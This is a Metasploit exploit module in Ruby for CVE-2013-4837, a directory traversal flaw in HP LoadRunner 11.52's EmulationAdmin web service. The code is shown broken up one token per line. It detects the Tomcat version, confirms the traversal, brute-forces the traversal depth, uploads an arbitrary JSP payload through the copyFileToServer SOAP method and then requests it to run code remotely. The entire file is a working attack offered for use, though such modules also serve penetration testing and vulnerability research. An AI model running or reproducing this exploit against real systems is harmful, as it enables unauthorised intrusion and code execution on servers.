require
'msf/core'
require
'rexml/document'
class
Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
HttpFingerprint = {
:pattern
=> [ /Apache-Coyote\/
1
\.
1
/ ] }
include
REXML
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def
initialize(info = {})
super
(update_info(info,
'Name'
=>
'HP LoadRunner EmulationAdmin Web Service Directory Traversal'
,
'Description'
=> %q{
This
module
exploits a directory traversal vulnerability on the version
11
.
52
of
HP
LoadRunner. The vulnerability exists on the EmulationAdmin web service, specifically
in
the copyFileToServer method, allowing to upload arbitrary files. This
module
has
been tested successfully on
HP
LoadRunner
11
.
52
over Windows
2003
SP2
.
},
'Author'
=>
[
'rgod <rgod[at]autistici.org>'
,
'juan vazquez'
],
'License'
=>
MSF_LICENSE
,
'References'
=>
[
[
'CVE'
,
'2013-4837'
],
[
'OSVDB'
,
'99231'
],
[
'BID'
,
'63475'
],
[
'ZDI'
,
'13-259'
],
[
'URL'
,
'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03969437'
]
],
'Privileged'
=>
true
,
'Platform'
=>
'win'
,
'Arch'
=>
ARCH_JAVA
,
'Targets'
=>
[
[
'HP LoadRunner 11.52'
, { } ],
],
'DefaultTarget'
=>
0
,
'DisclosureDate'
=>
'Oct 30 2013'
))
register_options(
[
Opt::
RPORT
(
8080
),
OptInt.
new
(
'DEPTH'
, [
true
,
'Traversal Depth (to reach the root folder)'
,
3
]),
OptString.
new
(
'INSTALLPATH'
, [
true
,
'HP LoadRunner Install Path (from the root folder)'
,
"Program Files\\HP\\LoadRunner"
])
],
self
.
class
)
end
def
get_soap_request(action, opts={})
path_param = opts[
:path
]
contents_param = opts[
:contents
]
se_name =
''
case
action
when
:upload
se_name =
'ser:copyFileToServer'
when
:read
se_name =
'ser:getFileContentAsLines'
end
xml = Document.
new
xml.add_element(
"soapenv:Envelope"
,
{
'xmlns:xsi'
=>
"http://www.w3.org/2001/XMLSchema-instance"
,
'xmlns:xsd'
=>
"http://www.w3.org/2001/XMLSchema"
,
'xmlns:soapenv'
=>
"http://schemas.xmlsoap.org/soap/envelope/"
,
'xmlns:ser'
=>
"http://service.emulation.ws.mercury.com"
})
xml.root.add_element(
"soapenv:Header"
)
xml.root.add_element(
"soapenv:Body"
)
body = xml.root.elements[
2
]
body.add_element(
se_name,
{
'soapenv:encodingStyle'
=>
"http://schemas.xmlsoap.org/soap/encoding/"
})
ser = body.elements[
1
]
ser.add_element(
"in0"
, {
'xsi:type'
=>
'xsd:int'
})
ser.elements[
'in0'
].text =
30000
+ rand(
30000
)
ser.add_element(
"in1"
, {
'xsi:type'
=>
'xsd:string'
})
ser.elements[
'in1'
].text = path_param
if
action ==
:upload
ser.add_element(
"in2"
, {
'xsi:type'
=>
"xsd:base64Binary"
})
ser.elements[
'in2'
].text = Rex::Text.encode_base64(contents_param)
end
xml.to_s
end
def
check
depth = datastore[
'DEPTH'
]
install_path = datastore[
'INSTALLPATH'
]
print_status(
"#{peer} - Detecting tomcat version..."
)
tomcat_version = get_tomcat_version
if
tomcat_version
print_status(
"#{peer} - Tomcat #{tomcat_version} detected... Verifying traversal..."
)
location =
""
location << install_path
location <<
"\\"
unless
install_path.ends_with(
"\\"
)
or
install_path.ends_with(
"/"
)
location <<
"apache-tomcat-#{tomcat_version}\\webapps\\ServiceEmulation"
res = read_file(depth, location,
"index.jsp"
)
if
res
and
res.code ==
200
and
res.body.to_s =~ /
HP
Service Emulation/
print_good(
"#{peer} - Traversal exists and parameters are correct..."
)
return
Exploit::CheckCode::Vulnerable
elsif
res
and
res.code ==
500
and
res.body.to_s =~ /FileNotFoundException/
print_warning(
"#{peer} - Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH..."
)
return
Exploit::CheckCode::Appears
else
print_status(
"#{peer} - Failed to verify the directory traversal..."
)
end
else
print_error(
"#{peer} - Tomcat version not detected..."
)
end
print_status(
"#{peer} - Checking if the vulnerable web service and method exist..."
)
res = send_request_cgi({
'uri'
=> normalize_uri(
'ServiceEmulation'
,
'services'
,
'EmulationAdmin'
),
'vars_get'
=> {
'wsdl'
=>
1
}
})
if
res
and
res.code ==
200
and
res.body.to_s =~ /wsdl.*EmulationAdmin/
and
res.body.to_s =~ /copyFileToServerRequest/
return
Exploit::CheckCode::Detected
end
return
Exploit::CheckCode::Safe
end
def
exploit
depth = datastore[
'DEPTH'
]
install_path = datastore[
'INSTALLPATH'
]
print_status(
"#{peer} - Retrieving the Tomcat version used..."
)
tomcat_version = get_tomcat_version
if
tomcat_version.
nil
?
fail_with(Failure::NoTarget,
"#{peer} - Failed to retrieve the Tomcat version used"
)
else
print_good(
"#{peer} - Tomcat #{tomcat_version} found"
)
end
print_status(
"#{peer} - Verifying parameters to exploit the directory traversal..."
)
brute_force =
false
location =
""
location << install_path
location <<
"\\"
unless
install_path.ends_with(
"\\"
)
or
install_path.ends_with(
"/"
)
location <<
"apache-tomcat-#{tomcat_version}\\webapps\\ServiceEmulation"
res = read_file(depth, location,
"index.jsp"
)
if
res
and
res.code ==
200
and
res.body.to_s =~ /
HP
Service Emulation/
print_good(
"#{peer} - Traversal parameters are correct"
)
elsif
res
and
res.code ==
500
and
res.body.to_s =~ /FileNotFoundException/
print_error(
"#{peer} - Traversal parameters are incorrect, will try to brute force depth..."
)
brute_force =
true
else
fail_with(Failure::Unknown,
"#{peer} - Unknown error while verifying the traversal parameters"
)
end
if
brute_force
print_status(
"#{peer} - Trying to brute force the traversal depth..."
)
depth = brute_force_depth(location)
if
depth.
nil
?
fail_with(Failure::BadConfig,
"#{peer} - Traversal parameters are incorrect, try setting DEPTH and INSTALLPATH"
)
end
print_good(
"#{peer} - Using #{depth} as depth length to exploit the traversal..."
)
end
jsp_name =
"#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
print_status(
"#{peer} - Uploading the JSP payload..."
)
res = upload_file(depth, location, jsp_name, payload.encoded)
if
res
and
res.code ==
200
and
res.body.to_s =~ /copyFileToServerResponse/
and
res.body.to_s !~ /faultcode/
print_status(
"#{peer} - JSP payload uploaded successfully"
)
register_files_for_cleanup(
"..\\..\\#{location}\\#{jsp_name}"
)
else
fail_with(Failure::Unknown,
"#{peer} - JSP payload upload failed"
)
end
print_status(
"#{peer} - Executing payload on #{normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin', jsp_name)}..."
)
send_request_cgi({
'uri'
=> normalize_uri(
'ServiceEmulation'
, jsp_name),
'method'
=>
'GET'
},
1
)
end
def
send_request_soap(soap_request)
res = send_request_cgi({
'uri'
=> normalize_uri(target_uri.path,
'ServiceEmulation'
,
'services'
,
'EmulationAdmin'
),
'method'
=>
'POST'
,
'ctype'
=>
'text/xml; charset=UTF-8'
,
'data'
=> soap_request,
'headers'
=> {
'SOAPAction'
=>
'""'
,
}
})
return
res
end
def
upload_file(traversal_depth, location, file_name, contents)
path =
"..\\"
* traversal_depth
path << location
path <<
"\\"
unless
location[-
1
] ==
"/"
or
location[-
1
] ==
"\\"
path << file_name
req = get_soap_request(
:upload
, {
:path
=> path,
:contents
=> contents})
return
send_request_soap(req)
end
def
read_file(traversal_depth, location, file_name)
path =
"..\\"
* traversal_depth
path << location
path <<
"\\"
unless
location[-
1
] ==
"/"
or
location[-
1
] ==
"\\"
path << file_name
req = get_soap_request(
:read
, {
:path
=> path})
return
send_request_soap(req)
end
def
brute_force_depth(location)
10
.times
do
|i|
res = read_file(i, location,
"index.jsp"
)
if
res
and
res.code ==
200
and
res.body.to_s =~ /
HP
Service Emulation/
return
i
end
end
return
nil
end
def
get_tomcat_version
res = send_request_cgi({
'uri'
=> normalize_uri(
'webdav'
)
})
if
res
and
res.code ==
200
and
res.body.to_s =~ /Apache Tomcat\/([\d\.]+)/
return
$1
end
return
nil
end
end